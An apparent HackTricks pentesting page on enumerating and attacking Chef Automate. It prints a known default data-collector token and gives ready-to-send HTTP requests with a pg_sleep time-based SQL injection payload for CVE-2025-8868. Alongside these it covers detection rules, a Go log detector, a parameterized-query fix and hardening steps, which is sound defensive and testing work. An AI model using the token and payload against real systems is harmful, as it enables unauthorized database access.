Chef Automate Enumeration & Attacks


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

This page collects practical techniques to enumerate and attack Chef Automate instances, with emphasis on:

  • Discovering gRPC-Gateway-backed REST endpoints and inferring request schemas via validation/error responses
  • Abusing the x-data-collector-token authentication header when defaults are present
  • Time-based blind SQL injection in the Compliance API (CVE-2025-8868) affecting the filters[].type field in /api/v0/compliance/profiles/search

Note: Backend responses that include header grpc-metadata-content-type: application/grpc typically indicate a gRPC-Gateway bridging REST calls to gRPC services.

Recon: Architecture and Fingerprints

  • Front-end: Often Angular. Static bundles can hint at REST paths (e.g., /api/v0/...)
  • API transport: REST to gRPC via gRPC-Gateway
    • Responses may include grpc-metadata-content-type: application/grpc
  • Database/driver fingerprints:
    • Error bodies starting with pq: strongly suggest PostgreSQL with the Go pq driver
  • Interesting Compliance endpoints (auth required):
    • POST /api/v0/compliance/profiles/search
    • POST /api/v0/compliance/scanner/jobs/search

Auth: Data Collector Token (x-data-collector-token)

Chef Automate exposes a data collector that authenticates requests via a dedicated header:

  • Header: x-data-collector-token
  • Risk: Some environments may retain a default token granting access to protected API routes. Known default observed in the wild:
    • 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

If present, this token can be used to call Compliance API endpoints otherwise gated by auth. Always attempt to rotate/disable defaults during hardening.

API Schema Inference via Error-Driven Discovery

gRPC-Gateway-backed endpoints often leak useful validation errors that describe the expected request model.

For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with:

  • type: string (filter field identifier)
  • values: array of strings

Example request shape:

```json
{
  "filters": [
    { "type": "name", "values": ["test"] }
  ]
}
```

Malformed JSON or wrong field types typically trigger 4xx/5xx responses whose error bodies hint at the expected model, while the grpc-metadata-content-type header confirms the gRPC-Gateway bridge. Use these to map fields and localize injection surfaces.

Compliance API SQL Injection (CVE-2025-8868)

  • Affected endpoint: POST /api/v0/compliance/profiles/search
  • Injection point: filters[].type
  • Vulnerability class: time-based blind SQL injection in PostgreSQL
  • Root cause: Lack of proper parameterization/whitelisting when interpolating the type field into a dynamic SQL fragment (likely used to construct identifiers/WHERE clauses). Crafted values in type are evaluated by PostgreSQL.

Working time-based payload:

```json
{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
```

Technique notes:

  • Close the original string with a single quote
  • Concatenate a subquery that calls pg_sleep(N)
  • Re-enter string context via || so the final SQL remains syntactically valid regardless of where type is embedded

Proof via differential latency

Send paired requests and compare response times to validate server-side execution:

  • N = 1 second

```http
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]}
```

  • N = 5 seconds

```http
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
```

Observed behavior:

  • Response times scale with pg_sleep(N)
  • HTTP 500 responses may include pq: details during probing, confirming SQL execution paths

Tip: Use a timing validator (e.g., multiple trials with statistical comparison) to reduce noise and false positives.

Impact

Authenticated users—or unauthenticated actors abusing a default x-data-collector-token—can execute arbitrary SQL within Chef Automate’s PostgreSQL context, risking confidentiality and integrity of compliance profiles, configuration, and telemetry.

Affected versions / Fix

  • CVE: CVE-2025-8868
  • Upgrade guidance: Chef Automate 4.13.295 or later (Linux x86) per vendor advisories

Detection and Forensics

  • API layer:
    • Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep
    • Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows
  • Database layer (PostgreSQL):
    • Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver)
  • Authentication:
    • Log and alert on usage of x-data-collector-token, especially known default values, across API paths
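
One way to turn the indicators above into a detection, as an added example that is not from this page or from Chef Automate: a Go function that scans constructed JSON access-log lines (a hypothetical, simplified log schema) and flags the known default token, SQL metacharacters in filters[].type, and pq: errors surfaced on 500 responses.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Default token quoted on this page; a request presenting it is an alert on its own.
const defaultCollectorToken = "93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506"
// apiEvent is a constructed, simplified access-log record (hypothetical schema, not Chef Automate's real log format).
type apiEvent struct {
	Path   string `json:"path"`
	Status int    `json:"status"`
	Token  string `json:"x_data_collector_token"`
	Error  string `json:"error"`
	Body   struct {
		Filters []struct{ Type string `json:"type"` } `json:"filters"`
	} `json:"body"`
}

// ClassifyEvent returns the alert reasons for one JSON log line (empty means benign).
func ClassifyEvent(line string) []string {
	var ev apiEvent
	if err := json.Unmarshal([]byte(line), &ev); err != nil {
		return []string{"unparseable log line"}
	}
	var reasons []string
	if ev.Token == defaultCollectorToken {
		reasons = append(reasons, "default x-data-collector-token presented for "+ev.Path)
	}
	if ev.Path != "/api/v0/compliance/profiles/search" {
		return reasons
	}
	for _, f := range ev.Body.Filters { // a real field identifier never contains quotes, || or a function name
		if t := strings.ToLower(f.Type); strings.Contains(t, "'") || strings.Contains(t, "||") || strings.Contains(t, "pg_sleep") {
			reasons = append(reasons, fmt.Sprintf("SQL metacharacters in filters[].type: %q", f.Type))
		}
	}
	if ev.Status == 500 && strings.HasPrefix(ev.Error, "pq:") {
		reasons = append(reasons, "pq: driver error returned to the client, so the input reached PostgreSQL")
	}
	return reasons
}

// Constructed sample lines: a benign search, then a probe presenting the default token.
var sampleLines = []string{
	`{"path":"/api/v0/compliance/profiles/search","status":200,"x_data_collector_token":"rotated-token","body":{"filters":[{"type":"name"}]}}`,
	`{"path":"/api/v0/compliance/profiles/search","status":500,"x_data_collector_token":"93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506","error":"pq: syntax error at or near \"||\"","body":{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'"}]}}`,
}
```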

Mitigations and Hardening

  • Immediate:
    • Rotate/disable default data collector tokens
    • Restrict ingress to data collector endpoints; enforce strong, unique tokens
  • Code-level:
    • Parameterize queries; never string-concatenate SQL fragments
    • Strictly whitelist allowed type values on the server (enum)
    • Avoid dynamic SQL assembly for identifiers/clauses; if dynamic behavior is required, use safe identifier quoting and explicit whitelists
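
An added example of the code-level fix (not Chef Automate's own code): the filters[].type value is only ever used as a key into a server-side allowlist, and every value becomes a PostgreSQL $n placeholder, so neither identifiers nor values are concatenated into the statement. The column names and the profiles table are assumptions for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// Filter mirrors one element of the request's filters array.
type Filter struct {
	Type   string   `json:"type"`
	Values []string `json:"values"`
}

// allowedFilterColumns maps each accepted filters[].type value to a column (names are
// assumptions, not Chef Automate's schema); the client string itself never enters SQL.
var allowedFilterColumns = map[string]string{
	"name":     "p.name",
	"version":  "p.version",
	"platform": "p.platform",
}

// ErrUnknownFilterType is returned instead of interpolating an unexpected type.
var ErrUnknownFilterType = errors.New("unknown filter type")
// BuildProfileSearch turns validated filters into a parameterized query: the column
// comes from the allowlist and each value is bound as a $n placeholder.
func BuildProfileSearch(filters []Filter) (string, []interface{}, error) {
	var where []string
	var args []interface{}
	for _, f := range filters {
		col, ok := allowedFilterColumns[f.Type]
		if !ok {
			return "", nil, fmt.Errorf("%w: %q", ErrUnknownFilterType, f.Type)
		}
		if len(f.Values) == 0 {
			continue
		}
		ph := make([]string, 0, len(f.Values))
		for _, v := range f.Values {
			args = append(args, v)
			ph = append(ph, fmt.Sprintf("$%d", len(args)))
		}
		where = append(where, fmt.Sprintf("%s IN (%s)", col, strings.Join(ph, ", ")))
	}
	query := "SELECT p.id, p.name, p.version FROM profiles p"
	if len(where) > 0 {
		query += " WHERE " + strings.Join(where, " AND ")
	}
	return query, args, nil
}
```

The returned query and args go straight to database/sql's QueryContext, so the driver (pq here) binds the values and the injection-shaped type from this page is rejected before any SQL is built.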

Practical Testing Checklist

  • Check if x-data-collector-token is accepted and whether the known default works
  • Map the Compliance API request schema by inducing validation errors and reading error messages/headers
  • Test for SQLi in less obvious "identifier-like" fields (e.g., filters[].type), not just values arrays or top-level text fields
  • Use time-based techniques with concatenation to keep SQL syntactically valid across contexts
